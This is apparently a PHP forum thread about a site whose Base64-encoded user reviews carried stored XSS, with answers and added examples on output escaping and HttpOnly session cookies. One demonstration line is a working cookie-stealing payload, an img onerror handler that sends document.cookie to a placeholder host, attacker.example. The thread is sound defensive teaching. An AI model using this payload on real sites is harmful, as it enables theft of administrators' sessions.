PHP
Anton, 2016-07-12 17:53:02

Is it possible to execute a malicious script?

I have a question. For example, when a user submits a review on my site, it is stored Base64-encoded in the database and then decoded in the admin panel for viewing and approval / rejection. Tell me, is it possible to execute malicious code or a shell disguised as a review this way? I found signs of hacking, tried sending a simple alert myself, and the alert window popped up, so it turns out scripts can be executed. Please help: how do I protect against this? By the way, here is what I found after decoding one of the reviews: 25061c62dc1f4d5183ff306b6ea410f7.jpg


2 answer(s)
entermix, 2016-07-12
@boypush

Filter the text before writing it to the database / before output, see
php.net/manual/ru/function.htmlspecialchars.php
UPD:

// escape for HTML output; ENT_QUOTES also covers single quotes inside attributes
echo htmlspecialchars(strip_tags(base64_decode($otz["text"])), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
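
The following is an added example, not code from the thread. It reproduces the situation Anton describes (a review stored Base64-encoded, decoded and printed in the admin panel) with a constructed payload, and puts the vulnerable rendering next to the escaped one. The review text, the host `attacker.example` and the function names `renderUnsafe` / `renderSafe` are all assumptions made for the demonstration.

```php
<?php
// Added example (not from the original thread). A review stored Base64-encoded can still
// carry a working stored-XSS payload; Base64 only hides it from a casual look at the table.
declare(strict_types=1);

// Constructed malicious "review": a broken <img> whose onerror handler ships the admin's
// document.cookie to the attacker. attacker.example is a placeholder, not a real host.
$maliciousReview = '<img src=x onerror="new Image().src=\'https://attacker.example/?c=\'+document.cookie">';

// This is what actually lands in the database row (the column name is assumed).
$row = ['text' => base64_encode($maliciousReview)];

// VULNERABLE: decode and print as-is. The browser parses the tag and runs the handler.
function renderUnsafe(array $row): string
{
    return base64_decode($row['text']);
}

// HARDENED: strict decode, then escape for an HTML context at output time.
function renderSafe(array $row): string
{
    $decoded = base64_decode($row['text'], true); // strict mode: non-Base64 input returns false
    if ($decoded === false) {
        return '[invalid review encoding]';
    }
    // ENT_QUOTES escapes both quote styles, so the text is also safe inside quoted attributes;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of silently returning an empty string.
    return htmlspecialchars($decoded, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

echo "Unsafe output (executes in the admin's browser):\n", renderUnsafe($row), "\n\n";
echo "Safe output (rendered as literal text):\n", renderSafe($row), "\n";
```

Run it from the command line and compare the two outputs: the safe version contains `&lt;img ... &gt;` and no raw `<`, `>`, `"` or `'`, so the browser shows the attack string instead of executing it. Two practical points: do the escaping at output time (the admin panel is the place where the text meets the browser), and treat `htmlspecialchars` as the essential step; `strip_tags` on its own is not a reliable sanitiser, it only removes what it recognises as tags.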

Denis Goncharenko, 2016-07-12
@denis79513

This is a virus; your cookies were stolen, and you probably stored your login and password in them)))))
Use strip_tags, htmlspecialchars and the like.
Do not store any important information in cookies, at most information about the browser and other things that do not pose a potential threat. Cookies are the most insecure place. In this script, a picture is supposedly loaded using JS, but what is actually transferred is your cookies (that is, the admin cookies).
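
The point above, that the injected JavaScript read the admin cookies via `document.cookie`, can also be addressed at the cookie level. The following is an added example, not code from the thread: it configures the PHP session cookie so that the session id is never visible to JavaScript, and keeps anything sensitive on the server side. The cookie name `ADMINSESSID` and the `admin_id` session key are assumptions. The array form of `session_set_cookie_params` requires PHP 7.3 or later, and the block must run before `session_start()` and before any output.

```php
<?php
// Added example (not from the original thread): harden the admin session cookie so that
// script injected into the admin panel cannot read it with document.cookie.
declare(strict_types=1);

session_set_cookie_params([
    'lifetime' => 0,        // session cookie, discarded when the browser closes
    'path'     => '/',
    'domain'   => '',       // current host only
    'secure'   => true,     // sent over HTTPS only
    'httponly' => true,     // not exposed to JavaScript: document.cookie will not contain it
    'samesite' => 'Strict', // not attached to cross-site requests
]);
session_name('ADMINSESSID'); // assumed name; any value not revealing the framework is fine
session_start();

// Only the opaque session id travels in the cookie. Login, password, role and similar
// data stay in $_SESSION on the server, so a leaked cookie carries no credentials.
function isAdminLoggedIn(): bool
{
    return isset($_SESSION['admin_id']) && is_int($_SESSION['admin_id']);
}

if (!isAdminLoggedIn()) {
    http_response_code(403);
    echo 'Not authorised';
    exit;
}
```

To check the result, open the admin panel with the browser's developer tools and type `document.cookie` in the console: the session cookie must not appear there, and the response headers should show `Set-Cookie: ADMINSESSID=...; path=/; secure; HttpOnly; SameSite=Strict`. This does not replace output escaping; an injected script can still act inside the page, it just can no longer carry the session cookie away.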
